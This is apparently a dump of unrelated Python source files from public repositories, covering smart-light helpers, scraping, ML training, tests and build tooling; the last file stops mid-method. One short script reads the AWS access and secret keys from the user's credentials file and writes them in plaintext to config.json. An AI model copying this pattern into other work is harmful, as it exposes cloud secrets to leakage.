homeassistant/components/hue/v2/helpers.py | MrDelik/core | 30,023 | 17927 | """Helper functions for Philips Hue v2."""
from __future__ import annotations
def normalize_hue_brightness(brightness: float | None) -> float | None:
"""Return calculated brightness values."""
if brightness is not None:
# Hue uses a range of [0, 100] to control brightness.
brightness = float((brightness / 255) * 100)
return brightness
def normalize_hue_transition(transition: float | None) -> float | None:
"""Return rounded transition values."""
if transition is not None:
# hue transition duration is in milliseconds and round them to 100ms
transition = int(round(transition, 1) * 1000)
return transition
def normalize_hue_colortemp(colortemp: int | None) -> int | None:
"""Return color temperature within Hue's ranges."""
if colortemp is not None:
# Hue only accepts a range between 153..500
colortemp = min(colortemp, 500)
colortemp = max(colortemp, 153)
return colortemp
|
source_code/3-2-download.py | VickyMin1994/easy-scraping-tutorial | 708 | 17946 | <gh_stars>100-1000
import os
os.makedirs('./img/', exist_ok=True)
IMAGE_URL = "https://mofanpy.com/static/img/description/learning_step_flowchart.png"
def urllib_download():
from urllib.request import urlretrieve
urlretrieve(IMAGE_URL, './img/image1.png') # whole document
def request_download():
import requests
r = requests.get(IMAGE_URL)
with open('./img/image2.png', 'wb') as f:
f.write(r.content) # whole document
def chunk_download():
import requests
r = requests.get(IMAGE_URL, stream=True) # stream loading
with open('./img/image3.png', 'wb') as f:
for chunk in r.iter_content(chunk_size=32):
f.write(chunk)
urllib_download()
print('download image1')
request_download()
print('download image2')
chunk_download()
print('download image3')
|
make_json.py | jfalcou/infra | 135 | 17963 | <reponame>jfalcou/infra<gh_stars>100-1000
from configparser import ConfigParser
import os
import json
obj = {}
config = ConfigParser()
config.read(os.path.join(os.getenv("HOME"), ".aws", "credentials"))
obj["MY_ACCESS_KEY"] = config.get("default", "aws_access_key_id", fallback="")
obj["MY_SECRET_KEY"] = config.get("default", "aws_secret_access_key", fallback="")
with open("config.json", "w") as out:
json.dump(obj, out)
|
python-sdk/nuimages/scripts/render_images.py | bjajoh/nuscenes-devkit | 1,284 | 17972 | # nuScenes dev-kit.
# Code written by <NAME>, 2020.
import argparse
import gc
import os
import random
from typing import List
from collections import defaultdict
import cv2
import tqdm
from nuimages.nuimages import NuImages
def render_images(nuim: NuImages,
mode: str = 'all',
cam_name: str = None,
log_name: str = None,
sample_limit: int = 50,
filter_categories: List[str] = None,
out_type: str = 'image',
out_dir: str = '~/Downloads/nuImages',
cleanup: bool = True) -> None:
"""
Render a random selection of images and save them to disk.
Note: The images rendered here are keyframes only.
:param nuim: NuImages instance.
:param mode: What to render:
"image" for the image without annotations,
"annotated" for the image with annotations,
"trajectory" for a rendering of the trajectory of the vehice,
"all" to render all of the above separately.
:param cam_name: Only render images from a particular camera, e.g. "CAM_BACK'.
:param log_name: Only render images from a particular log, e.g. "n013-2018-09-04-13-30-50+0800".
:param sample_limit: Maximum number of samples (images) to render. Note that the mini split only includes 50 images.
:param filter_categories: Specify a list of object_ann category names. Every sample that is rendered must
contain annotations of any of those categories.
:param out_type: The output type as one of the following:
'image': Renders a single image for the image keyframe of each sample.
'video': Renders a video for all images/pcls in the clip associated with each sample.
:param out_dir: Folder to render the images to.
:param cleanup: Whether to delete images after rendering the video. Not relevant for out_type == 'image'.
"""
# Check and convert inputs.
assert out_type in ['image', 'video'], ' Error: Unknown out_type %s!' % out_type
all_modes = ['image', 'annotated', 'trajectory']
assert mode in all_modes + ['all'], 'Error: Unknown mode %s!' % mode
assert not (out_type == 'video' and mode == 'trajectory'), 'Error: Cannot render "trajectory" for videos!'
if mode == 'all':
if out_type == 'image':
modes = all_modes
elif out_type == 'video':
modes = [m for m in all_modes if m not in ['annotated', 'trajectory']]
else:
raise Exception('Error" Unknown mode %s!' % mode)
else:
modes = [mode]
if filter_categories is not None:
category_names = [c['name'] for c in nuim.category]
for category_name in filter_categories:
assert category_name in category_names, 'Error: Invalid object_ann category %s!' % category_name
# Create output folder.
out_dir = os.path.expanduser(out_dir)
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
# Filter by camera.
sample_tokens = [s['token'] for s in nuim.sample]
if cam_name is not None:
sample_tokens_cam = []
for sample_token in sample_tokens:
sample = nuim.get('sample', sample_token)
key_camera_token = sample['key_camera_token']
sensor = nuim.shortcut('sample_data', 'sensor', key_camera_token)
if sensor['channel'] == cam_name:
sample_tokens_cam.append(sample_token)
sample_tokens = sample_tokens_cam
# Filter by log.
if log_name is not None:
sample_tokens_cleaned = []
for sample_token in sample_tokens:
sample = nuim.get('sample', sample_token)
log = nuim.get('log', sample['log_token'])
if log['logfile'] == log_name:
sample_tokens_cleaned.append(sample_token)
sample_tokens = sample_tokens_cleaned
# Filter samples by category.
if filter_categories is not None:
# Get categories in each sample.
sd_to_object_cat_names = defaultdict(lambda: set())
for object_ann in nuim.object_ann:
category = nuim.get('category', object_ann['category_token'])
sd_to_object_cat_names[object_ann['sample_data_token']].add(category['name'])
# Filter samples.
sample_tokens_cleaned = []
for sample_token in sample_tokens:
sample = nuim.get('sample', sample_token)
key_camera_token = sample['key_camera_token']
category_names = sd_to_object_cat_names[key_camera_token]
if any([c in category_names for c in filter_categories]):
sample_tokens_cleaned.append(sample_token)
sample_tokens = sample_tokens_cleaned
# Get a random selection of samples.
random.shuffle(sample_tokens)
# Limit number of samples.
sample_tokens = sample_tokens[:sample_limit]
print('Rendering %s for mode %s to folder %s...' % (out_type, mode, out_dir))
for sample_token in tqdm.tqdm(sample_tokens):
sample = nuim.get('sample', sample_token)
log = nuim.get('log', sample['log_token'])
log_name = log['logfile']
key_camera_token = sample['key_camera_token']
sensor = nuim.shortcut('sample_data', 'sensor', key_camera_token)
sample_cam_name = sensor['channel']
sd_tokens = nuim.get_sample_content(sample_token)
# We cannot render a video if there are missing camera sample_datas.
if len(sd_tokens) < 13 and out_type == 'video':
print('Warning: Skipping video for sample token %s, as not all 13 frames exist!' % sample_token)
continue
for mode in modes:
out_path_prefix = os.path.join(out_dir, '%s_%s_%s_%s' % (log_name, sample_token, sample_cam_name, mode))
if out_type == 'image':
write_image(nuim, key_camera_token, mode, '%s.jpg' % out_path_prefix)
elif out_type == 'video':
write_video(nuim, sd_tokens, mode, out_path_prefix, cleanup=cleanup)
def write_video(nuim: NuImages,
sd_tokens: List[str],
mode: str,
out_path_prefix: str,
cleanup: bool = True) -> None:
"""
Render a video by combining all the images of type mode for each sample_data.
:param nuim: NuImages instance.
:param sd_tokens: All sample_data tokens in chronological order.
:param mode: The mode - see render_images().
:param out_path_prefix: The file prefix used for the images and video.
:param cleanup: Whether to delete images after rendering the video.
"""
# Loop through each frame to create the video.
out_paths = []
for i, sd_token in enumerate(sd_tokens):
out_path = '%s_%d.jpg' % (out_path_prefix, i)
out_paths.append(out_path)
write_image(nuim, sd_token, mode, out_path)
# Create video.
first_im = cv2.imread(out_paths[0])
freq = 2 # Display frequency (Hz).
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
video_path = '%s.avi' % out_path_prefix
out = cv2.VideoWriter(video_path, fourcc, freq, first_im.shape[1::-1])
# Load each image and add to the video.
for out_path in out_paths:
im = cv2.imread(out_path)
out.write(im)
# Delete temporary image if requested.
if cleanup:
os.remove(out_path)
# Finalize video.
out.release()
def write_image(nuim: NuImages, sd_token: str, mode: str, out_path: str) -> None:
"""
Render a single image of type mode for the given sample_data.
:param nuim: NuImages instance.
:param sd_token: The sample_data token.
:param mode: The mode - see render_images().
:param out_path: The file to write the image to.
"""
if mode == 'annotated':
nuim.render_image(sd_token, annotation_type='all', out_path=out_path)
elif mode == 'image':
nuim.render_image(sd_token, annotation_type='none', out_path=out_path)
elif mode == 'trajectory':
sample_data = nuim.get('sample_data', sd_token)
nuim.render_trajectory(sample_data['sample_token'], out_path=out_path)
else:
raise Exception('Error: Unknown mode %s!' % mode)
# Trigger garbage collection to avoid memory overflow from the render functions.
gc.collect()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Render a random selection of images and save them to disk.')
parser.add_argument('--seed', type=int, default=42) # Set to 0 to disable.
parser.add_argument('--version', type=str, default='v1.0-mini')
parser.add_argument('--dataroot', type=str, default='/data/sets/nuimages')
parser.add_argument('--verbose', type=int, default=1)
parser.add_argument('--mode', type=str, default='all')
parser.add_argument('--cam_name', type=str, default=None)
parser.add_argument('--log_name', type=str, default=None)
parser.add_argument('--sample_limit', type=int, default=50)
parser.add_argument('--filter_categories', action='append')
parser.add_argument('--out_type', type=str, default='image')
parser.add_argument('--out_dir', type=str, default='~/Downloads/nuImages')
args = parser.parse_args()
# Set random seed for reproducible image selection.
if args.seed != 0:
random.seed(args.seed)
# Initialize NuImages class.
nuim_ = NuImages(version=args.version, dataroot=args.dataroot, verbose=bool(args.verbose), lazy=False)
# Render images.
render_images(nuim_, mode=args.mode, cam_name=args.cam_name, log_name=args.log_name, sample_limit=args.sample_limit,
filter_categories=args.filter_categories, out_type=args.out_type, out_dir=args.out_dir)
|
controllers/social_auth/kivyauth/__init__.py | richierh/SalesKivyMD | 126 | 17977 | <filename>controllers/social_auth/kivyauth/__init__.py
from kivy.logger import Logger
from kivy.utils import platform
__version__ = "2.3.2"
_log_message = "KivyAuth:" + f" {__version__}" + f' (installed at "{__file__}")'
__all__ = ("login_providers", "auto_login")
Logger.info(_log_message)
|
tests/resources/selenium/test_nfc.py | Avi-Labs/taurus | 1,743 | 18011 | # coding=utf-8
import logging
import random
import string
import sys
import unittest
from time import time, sleep
import apiritif
import os
import re
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException, TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support import expected_conditions as econd
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from bzt.resources.selenium_extras import waiter, get_locator
class TestSc1(unittest.TestCase):
def setUp(self):
self.vars = {}
timeout = 2.0
options = webdriver.FirefoxOptions()
profile = webdriver.FirefoxProfile()
profile.set_preference('webdriver.log.file', '/somewhere/webdriver.log')
options.set_capability('unhandledPromptBehavior', 'ignore')
self.driver = webdriver.Firefox(profile, options=options)
self.driver.implicitly_wait(timeout)
apiritif.put_into_thread_store(timeout=timeout, func_mode=False,
driver=self.driver, windows={}, scenario_name='sc1')
def _1_httpsblazedemocomsetup1(self):
with apiritif.smart_transaction('https://blazedemo.com/setup1'):
self.driver.get('https://blazedemo.com/setup1')
def _2_setup2(self):
with apiritif.smart_transaction('setup2'):
self.driver.get('https://blazedemo.com/setup2')
waiter()
def _3_httpsblazedemocommain1(self):
with apiritif.smart_transaction('https://blazedemo.com/main1'):
self.driver.get('https://blazedemo.com/main1')
def _4_main2(self):
with apiritif.smart_transaction('main2'):
self.driver.get('https://blazedemo.com/main2')
waiter()
def _5_httpsblazedemocomteardown1(self):
with apiritif.smart_transaction('https://blazedemo.com/teardown1'):
self.driver.get('https://blazedemo.com/teardown1')
def _6_teardown2(self):
with apiritif.smart_transaction('teardown2'):
self.driver.get('https://blazedemo.com/teardown2')
waiter()
def test_sc1(self):
try:
self._1_httpsblazedemocomsetup1()
self._2_setup2()
self._3_httpsblazedemocommain1()
self._4_main2()
finally:
apiritif.set_stage("teardown") # can't be interrupted
self._5_httpsblazedemocomteardown1()
self._6_teardown2()
def tearDown(self):
if self.driver:
self.driver.quit()
|
contrib/opencensus-ext-datadog/opencensus/ext/datadog/transport.py | Flared/opencensus-python | 650 | 18088 | <reponame>Flared/opencensus-python
import platform
import requests
class DDTransport(object):
""" DDTransport contains all the logic for sending Traces to Datadog
:type trace_addr: str
:param trace_addr: trace_addr specifies the host[:port] address of the
Datadog Trace Agent.
"""
def __init__(self, trace_addr):
self._trace_addr = trace_addr
self._headers = {
"Datadog-Meta-Lang": "python",
"Datadog-Meta-Lang-Interpreter": platform.platform(),
# Following the example of the Golang version it is prefixed
# OC for Opencensus.
"Datadog-Meta-Tracer-Version": "OC/0.0.1",
"Content-Type": "application/json",
}
@property
def trace_addr(self):
""" specifies the host[:port] address of the Datadog Trace Agent.
"""
return self._trace_addr
@property
def headers(self):
""" specifies the headers that will be attached to HTTP request sent to DD.
"""
return self._headers
def send_traces(self, trace):
""" Sends traces to the Datadog Tracing Agent
:type trace: dic
:param trace: Trace dictionary
"""
requests.post("http://" + self.trace_addr + "/v0.4/traces",
json=trace,
headers=self.headers)
|
SCSCons/Variables/PackageVariable.py | Relintai/pandemonium_engine | 1,403 | 18096 | <reponame>Relintai/pandemonium_engine
# MIT License
#
# Copyright The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Variable type for package Variables.
To be used whenever a 'package' may be enabled/disabled and the
package path may be specified.
Given these options ::
x11=no (disables X11 support)
x11=yes (will search for the package installation dir)
x11=/usr/local/X11 (will check this path for existence)
Can be used as a replacement for autoconf's ``--with-xxx=yyy`` ::
opts = Variables()
opts.Add(
PackageVariable(
key='x11',
help='use X11 installed here (yes = search some places)',
default='yes'
)
)
...
if env['x11'] == True:
dir = ... # search X11 in some standard places ...
env['x11'] = dir
if env['x11']:
... # build with x11 ...
"""
from typing import Tuple, Callable
import SCons.Errors
__all__ = ['PackageVariable',]
ENABLE_STRINGS = ('1', 'yes', 'true', 'on', 'enable', 'search')
DISABLE_STRINGS = ('0', 'no', 'false', 'off', 'disable')
def _converter(val):
""" """
lval = val.lower()
if lval in ENABLE_STRINGS:
return True
if lval in DISABLE_STRINGS:
return False
return val
def _validator(key, val, env, searchfunc) -> None:
""" """
# NB: searchfunc is currently undocumented and unsupported
# TODO write validator, check for path
import os
if env[key] is True:
if searchfunc:
env[key] = searchfunc(key, val)
elif env[key] and not os.path.exists(val):
raise SCons.Errors.UserError(
'Path does not exist for option %s: %s' % (key, val))
def PackageVariable(key, help, default, searchfunc=None) -> Tuple[str, str, str, Callable, Callable]:
"""Return a tuple describing a package list SCons Variable.
The input parameters describe a 'package list' option. Returns
a tuple including the correct converter and validator appended.
The result is usable as input to :meth:`Add` .
A 'package list' option may either be 'all', 'none' or a pathname
string. This information is appended to *help*.
"""
# NB: searchfunc is currently undocumented and unsupported
help = '\n '.join(
(help, '( yes | no | /path/to/%s )' % key))
return (key, help, default,
lambda k, v, e: _validator(k, v, e, searchfunc),
_converter)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
tests/guinea-pigs/unittest/expected_failure.py | Tirzono/teamcity-messages | 105 | 18108 | <filename>tests/guinea-pigs/unittest/expected_failure.py
# coding=utf-8
import sys
from teamcity.unittestpy import TeamcityTestRunner
if sys.version_info < (2, 7):
from unittest2 import main, TestCase, expectedFailure
else:
from unittest import main, TestCase, expectedFailure
class TestSkip(TestCase):
def test_expected_failure(self):
self.fail("this should happen unfortunately")
test_expected_failure = expectedFailure(test_expected_failure)
main(testRunner=TeamcityTestRunner)
|
_Dist/NeuralNetworks/b_TraditionalML/MultinomialNB.py | leoatchina/MachineLearning | 1,107 | 18117 | <filename>_Dist/NeuralNetworks/b_TraditionalML/MultinomialNB.py<gh_stars>1000+
import numpy as np
from sklearn.preprocessing import OneHotEncoder
class MultinomialNB:
""" Naive Bayes algorithm with discrete inputs
Parameters
----------
alpha : float, optional (default=1.)
Smooth parameter used in Naive Bayes, default is 1 (which indicates a laplace smoothing)
Attributes
----------
enc : OneHotEncoder
One-Hot encoder used to transform (discrete) inputs
class_log_prior : np.ndarray of float
Log class prior used to calculate (linear) prediction
feature_log_prob : np.ndarray of float
Feature log probability used to calculate (linear) prediction
Examples
--------
>>> import numpy as np
>>> x = np.random.randint(0, 10, [1000, 10]) # Generate feature vectors
>>> y = np.random.randint(0, 5, 1000) # Generate labels
>>> nb = MultinomialNB().fit(x, y) # fit the model
>>> nb.predict(x) # (linear) prediction
>>> nb.predict_class(x) # predict labels
"""
def __init__(self, alpha=1.):
self.alpha = alpha
self.enc = self.class_log_prior = self.feature_log_prob = None
def fit(self, x, y, do_one_hot=True):
""" Fit the model with x & y
Parameters
----------
x : {list of float, np.ndarray of float}
Feature vectors used for training
Note: features are assumed to be discrete
y : {list of float, np.ndarray of float}
Labels used for training
do_one_hot : bool, optional (default=True)
Whether do one-hot encoding on x
Returns
-------
self : MultinomialNB
Returns self.
"""
if do_one_hot:
self.enc = OneHotEncoder(dtype=np.float32)
x = self.enc.fit_transform(x)
else:
self.enc = None
x = np.array(x, np.float32)
n = x.shape[0]
y = np.array(y, np.int8)
self.class_log_prior = np.log(np.bincount(y) / n)
masks = [y == i for i in range(len(self.class_log_prior))]
masked_xs = [x[mask] for mask in masks]
feature_counts = np.array([np.asarray(masked_x.sum(0))[0] for masked_x in masked_xs])
smoothed_fc = feature_counts + self.alpha
self.feature_log_prob = np.log(smoothed_fc / smoothed_fc.sum(1, keepdims=True))
return self
def _predict(self, x):
""" Internal method for calculating (linear) predictions
Parameters
----------
x : {np.ndarray of float, scipy.sparse.csr.csr_matrix of float}
One-Hot encoded feature vectors
Returns
-------
predictions : np.ndarray of float
Returns (linear) predictions.
"""
return x.dot(self.feature_log_prob.T) + self.class_log_prior
def predict(self, x):
""" API for calculating (linear) predictions
Parameters
----------
x : {list of float, np.ndarray of float}
Target feature vectors
Returns
-------
predictions : np.ndarray of float
Returns (linear) predictions.
"""
if self.enc is not None:
x = self.enc.transform(x)
return self._predict(x)
def predict_class(self, x):
""" API for predicting labels
Parameters
----------
x : {list of float, np.ndarray of float}
Target feature vectors
Returns
-------
labels : np.ndarray of int
Returns labels.
"""
return np.argmax(self.predict(x), 1)
|
batch_score.py | Lufedi/reaper | 106 | 18120 | <reponame>Lufedi/reaper
#!/usr/bin/env python3
import argparse
import os
import sys
import traceback
from lib import core, utilities, run
from lib.attributes import Attributes
from lib.database import Database
def process_arguments():
"""
Uses the argparse module to parse commandline arguments.
Returns:
Dictionary of parsed commandline arguments.
"""
parser = argparse.ArgumentParser(
description='Calculate the scores of a set of repositories.'
)
parser.add_argument(
'--cleanup',
action='store_true',
dest='cleanup',
help='Delete cloned repositories from the disk when done.'
)
parser.add_argument(
'-c',
'--config',
type=argparse.FileType('r'),
default='config.json',
dest='config_file',
help='Path to the configuration file.'
)
parser.add_argument(
'-m',
'--manifest',
type=argparse.FileType('r'),
default='manifest.json',
dest='manifest_file',
help='Path to the manifest file.'
)
parser.add_argument(
'-r',
'--repositories-root',
dest='repositories_root',
help='Path to the root of downloaded repositories.'
)
parser.add_argument(
'-s',
'--repositories-sample',
type=argparse.FileType('r'),
dest='repositories_sample',
help='A file containing newline-separated GHTorrent project ids'
)
parser.add_argument(
'-k',
'--key-string',
type=str,
dest='key_string',
default=None,
required=False,
help='String of attribute initials. Uppercase to persist data'
)
parser.add_argument(
'-n',
'--num-processes',
type=int,
dest='num_processes',
default=1,
required=False,
help=(
'Number of processes to spawn when processing repositories'
' from the samples file.'
)
)
parser.add_argument(
'--goldenset',
action='store_true',
dest='goldenset',
help=(
'Indicate that the repositories sample file contains projects'
' from the Golden Set.'
)
)
if len(sys.argv) < 2:
parser.print_help()
sys.exit(1)
return parser.parse_args()
def main():
"""
Main execution flow.
"""
try:
args = process_arguments()
config = utilities.read(args.config_file)
manifest = utilities.read(args.manifest_file)
# TODO: Refactor
core.config = config
utilities.TOKENIZER = core.Tokenizer()
database = Database(config['options']['datasource'])
globaloptions = {
'today': config['options']['today'],
'timeout': config['options']['timeout']
}
attributes = Attributes(
manifest['attributes'], database, args.cleanup, args.key_string,
**globaloptions
)
if not os.path.exists(args.repositories_root):
os.makedirs(args.repositories_root, exist_ok=True)
table = 'reaper_results'
if args.goldenset:
table = 'reaper_goldenset'
_run = run.Run(
args.repositories_root, attributes, database,
config['options']['threshold'], args.num_processes
)
_run.run([int(line) for line in args.repositories_sample], table)
except Exception as e:
extype, exvalue, extrace = sys.exc_info()
traceback.print_exception(extype, exvalue, extrace)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print('\rCaught interrupt, killing all children...')
|
tests/data/samplers/bucket_batch_sampler_test.py | MSLars/allennlp | 11,433 | 18165 | <gh_stars>1000+
from allennlp.common import Params
from allennlp.data import Instance, Token, Batch
from allennlp.data.fields import TextField
from allennlp.data.samplers import BucketBatchSampler
from allennlp.data.data_loaders import MultiProcessDataLoader
from .sampler_test import SamplerTest
class TestBucketSampler(SamplerTest):
def test_create_batches_groups_correctly(self):
sampler = BucketBatchSampler(batch_size=2, padding_noise=0, sorting_keys=["text"])
grouped_instances = []
for indices in sampler.get_batch_indices(self.instances):
grouped_instances.append([self.instances[idx] for idx in indices])
expected_groups = [
[self.instances[4], self.instances[2]],
[self.instances[0], self.instances[1]],
[self.instances[3]],
]
for group in grouped_instances:
assert group in expected_groups
expected_groups.remove(group)
assert expected_groups == []
def test_disable_shuffle(self):
sampler = BucketBatchSampler(batch_size=2, sorting_keys=["text"], shuffle=False)
grouped_instances = []
for indices in sampler.get_batch_indices(self.instances):
grouped_instances.append([self.instances[idx] for idx in indices])
expected_groups = [
[self.instances[4], self.instances[2]],
[self.instances[0], self.instances[1]],
[self.instances[3]],
]
for idx, group in enumerate(grouped_instances):
assert group == expected_groups[idx]
def test_guess_sorting_key_picks_the_longest_key(self):
sampler = BucketBatchSampler(batch_size=2, padding_noise=0)
instances = []
short_tokens = [Token(t) for t in ["what", "is", "this", "?"]]
long_tokens = [Token(t) for t in ["this", "is", "a", "not", "very", "long", "passage"]]
instances.append(
Instance(
{
"question": TextField(short_tokens, self.token_indexers),
"passage": TextField(long_tokens, self.token_indexers),
}
)
)
instances.append(
Instance(
{
"question": TextField(short_tokens, self.token_indexers),
"passage": TextField(long_tokens, self.token_indexers),
}
)
)
instances.append(
Instance(
{
"question": TextField(short_tokens, self.token_indexers),
"passage": TextField(long_tokens, self.token_indexers),
}
)
)
assert sampler.sorting_keys is None
sampler._guess_sorting_keys(instances)
assert sampler.sorting_keys == ["passage"]
def test_from_params(self):
params = Params({})
sorting_keys = ["s1", "s2"]
params["sorting_keys"] = sorting_keys
params["batch_size"] = 32
sampler = BucketBatchSampler.from_params(params=params)
assert sampler.sorting_keys == sorting_keys
assert sampler.padding_noise == 0.1
assert sampler.batch_size == 32
params = Params(
{
"sorting_keys": sorting_keys,
"padding_noise": 0.5,
"batch_size": 100,
"drop_last": True,
}
)
sampler = BucketBatchSampler.from_params(params=params)
assert sampler.sorting_keys == sorting_keys
assert sampler.padding_noise == 0.5
assert sampler.batch_size == 100
assert sampler.drop_last
def test_drop_last_works(self):
sampler = BucketBatchSampler(
batch_size=2,
padding_noise=0,
sorting_keys=["text"],
drop_last=True,
)
# We use a custom collate_fn for testing, which doesn't actually create tensors,
# just the allennlp Batches.
def collate_fn(x, **kwargs):
return Batch(x)
data_loader = MultiProcessDataLoader(
self.get_mock_reader(),
"fake_path",
batch_sampler=sampler,
)
data_loader.collate_fn = collate_fn
data_loader.index_with(self.vocab)
batches = [batch for batch in iter(data_loader)]
stats = self.get_batches_stats(batches)
# all batches have length batch_size
assert all(batch_len == 2 for batch_len in stats["batch_lengths"])
# we should have lost one instance by skipping the last batch
assert stats["total_instances"] == len(self.instances) - 1
def test_batch_count(self):
sampler = BucketBatchSampler(batch_size=2, padding_noise=0, sorting_keys=["text"])
data_loader = MultiProcessDataLoader(
self.get_mock_reader(), "fake_path", batch_sampler=sampler
)
data_loader.index_with(self.vocab)
assert len(data_loader) == 3
def test_batch_count_with_drop_last(self):
sampler = BucketBatchSampler(
batch_size=2,
padding_noise=0,
sorting_keys=["text"],
drop_last=True,
)
data_loader = MultiProcessDataLoader(
self.get_mock_reader(), "fake_path", batch_sampler=sampler
)
assert len(data_loader) == 2
|
river/compose/renamer.py | online-ml/creme | 1,105 | 18196 | <filename>river/compose/renamer.py
from typing import Dict
from river import base
__all__ = ["Renamer", "Prefixer", "Suffixer"]
class Renamer(base.Transformer):
"""Renames features following substitution rules.
Parameters
----------
mapping
Dictionnary describing substitution rules. Keys in `mapping` that are not a feature's name are silently ignored.
Examples
--------
>>> from river import compose
>>> mapping = {'a': 'v', 'c': 'o'}
>>> x = {'a': 42, 'b': 12}
>>> compose.Renamer(mapping).transform_one(x)
{'b': 12, 'v': 42}
"""
def __init__(self, mapping: Dict[str, str]):
self.mapping = mapping
def transform_one(self, x):
for old_key, new_key in self.mapping.items():
try:
x[new_key] = x.pop(old_key)
except KeyError:
pass # Ignoring keys that are not a feature's name
return x
class Prefixer(base.Transformer):
"""Prepends a prefix on features names.
Parameters
----------
prefix
Examples
--------
>>> from river import compose
>>> x = {'a': 42, 'b': 12}
>>> compose.Prefixer('prefix_').transform_one(x)
{'prefix_a': 42, 'prefix_b': 12}
"""
def __init__(self, prefix: str):
self.prefix = prefix
def _rename(self, s: str) -> str:
return f"{self.prefix}{s}"
def transform_one(self, x):
return {self._rename(i): xi for i, xi in x.items()}
class Suffixer(base.Transformer):
"""Appends a suffix on features names.
Parameters
----------
suffix
Examples
--------
>>> from river import compose
>>> x = {'a': 42, 'b': 12}
>>> compose.Suffixer('_suffix').transform_one(x)
{'a_suffix': 42, 'b_suffix': 12}
"""
def __init__(self, suffix: str):
self.suffix = suffix
def _rename(self, s: str) -> str:
return f"{s}{self.suffix}"
def transform_one(self, x):
return {self._rename(i): xi for i, xi in x.items()}
|
recipes/LibriSpeech/ASR/CTC/train_with_wav2vec.py | mj-kh/speechbrain | 3,913 | 18204 | #!/usr/bin/env/python3
"""Recipe for training a wav2vec-based ctc ASR system with librispeech.
The system employs wav2vec as its encoder. Decoding is performed with
ctc greedy decoder.
To run this recipe, do the following:
> python train_with_wav2vec.py hparams/train_with_wav2vec.yaml
The neural network is trained on CTC likelihood target and character units
are used as basic recognition tokens. Training is performed on the full
LibriSpeech dataset (960 h).
Authors
* <NAME> 2021
* <NAME> 2021
* <NAME> 2020
* <NAME> 2020
* <NAME> 2020
* <NAME> 2020
* <NAME> 2020
"""
import os
import sys
import torch
import logging
import speechbrain as sb
from speechbrain.utils.distributed import run_on_main
from hyperpyyaml import load_hyperpyyaml
from pathlib import Path
logger = logging.getLogger(__name__)
# Define training procedure
class ASR(sb.Brain):
def compute_forward(self, batch, stage):
"""Forward computations from the waveform batches to the output probabilities."""
batch = batch.to(self.device)
wavs, wav_lens = batch.sig
tokens_bos, _ = batch.tokens_bos
wavs, wav_lens = wavs.to(self.device), wav_lens.to(self.device)
# Add augmentation if specified
if stage == sb.Stage.TRAIN:
if hasattr(self.modules, "env_corrupt"):
wavs_noise = self.modules.env_corrupt(wavs, wav_lens)
wavs = torch.cat([wavs, wavs_noise], dim=0)
wav_lens = torch.cat([wav_lens, wav_lens])
tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0)
if hasattr(self.hparams, "augmentation"):
wavs = self.hparams.augmentation(wavs, wav_lens)
# Forward pass
feats = self.modules.wav2vec2(wavs)
x = self.modules.enc(feats)
# Compute outputs
p_tokens = None
logits = self.modules.ctc_lin(x)
p_ctc = self.hparams.log_softmax(logits)
if stage != sb.Stage.TRAIN:
p_tokens = sb.decoders.ctc_greedy_decode(
p_ctc, wav_lens, blank_id=self.hparams.blank_index
)
return p_ctc, wav_lens, p_tokens
def compute_objectives(self, predictions, batch, stage):
"""Computes the loss (CTC+NLL) given predictions and targets."""
p_ctc, wav_lens, predicted_tokens = predictions
ids = batch.id
tokens_eos, tokens_eos_lens = batch.tokens_eos
tokens, tokens_lens = batch.tokens
if hasattr(self.modules, "env_corrupt") and stage == sb.Stage.TRAIN:
tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0)
tokens_eos_lens = torch.cat(
[tokens_eos_lens, tokens_eos_lens], dim=0
)
tokens = torch.cat([tokens, tokens], dim=0)
tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0)
loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens)
loss = loss_ctc
if stage != sb.Stage.TRAIN:
# Decode token terms to words
predicted_words = [
"".join(self.tokenizer.decode_ndim(utt_seq)).split(" ")
for utt_seq in predicted_tokens
]
target_words = [wrd.split(" ") for wrd in batch.wrd]
self.wer_metric.append(ids, predicted_words, target_words)
self.cer_metric.append(ids, predicted_words, target_words)
return loss
def fit_batch(self, batch):
"""Train the parameters given a single batch in input"""
predictions = self.compute_forward(batch, sb.Stage.TRAIN)
loss = self.compute_objectives(predictions, batch, sb.Stage.TRAIN)
loss.backward()
if self.check_gradients(loss):
self.wav2vec_optimizer.step()
self.model_optimizer.step()
self.wav2vec_optimizer.zero_grad()
self.model_optimizer.zero_grad()
return loss.detach()
def evaluate_batch(self, batch, stage):
"""Computations needed for validation/test batches"""
predictions = self.compute_forward(batch, stage=stage)
with torch.no_grad():
loss = self.compute_objectives(predictions, batch, stage=stage)
return loss.detach()
def on_stage_start(self, stage, epoch):
"""Gets called at the beginning of each epoch"""
if stage != sb.Stage.TRAIN:
self.cer_metric = self.hparams.cer_computer()
self.wer_metric = self.hparams.error_rate_computer()
